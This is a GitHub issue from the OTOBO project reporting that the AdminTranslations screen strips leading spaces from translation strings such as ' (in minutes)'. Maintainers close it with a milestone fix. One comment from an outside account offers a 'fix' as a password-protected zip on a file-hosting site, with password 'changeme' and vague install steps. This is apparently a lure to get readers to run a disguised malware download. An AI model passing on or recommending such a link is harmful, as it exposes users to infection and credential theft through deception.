Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

AdminTranslations removes leading empty spaces after saving the translation #3728

Closed
StefanAbel-OTOBO opened this issue Aug 26, 2024 · 0 comments
Assignees
Labels
bug Something isn't working as intended
Milestone

Comments

@StefanAbel-OTOBO
Copy link
Contributor

When you add a new translation via Action=AdminTranslations and source or target language string contain a leading empty space ' ', it is automatically removed from both strings after saving the translation.
This is important, because you e.g. have the System Configuration setting "Ticket::Frontend::TimeUnits", where by default you have the string " (work units)" which you often change, e.g. to " (in minutes)". This string always contains the leading empty space.
When you e.g. translate now " (in minutes)" to " (in Minuten)" in German and save it, you have the source string "(in minutes)" and the target string "(in MInuten)".
This is after saving:
image

I tested in ov270 with OTOBO 11.0.5

(Another workaround fix would be to not have the empty space in the setting necessary, but it should work nevertheless.)

@StefanAbel-OTOBO StefanAbel-OTOBO added the bug Something isn't working as intended label Aug 26, 2024
@deverchettychandrashekar

to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@svenoe svenoe added this to the OTOBO 11.0.6 milestone Sep 2, 2024
@svenoe svenoe closed this as completed Sep 5, 2024
MichaelThumes added a commit that referenced this issue Sep 5, 2024
MichaelThumes added a commit that referenced this issue Sep 6, 2024
svenoe pushed a commit that referenced this issue Sep 19, 2024
svenoe pushed a commit that referenced this issue Sep 19, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working as intended
Projects
None yet
Development

No branches or pull requests

4 participants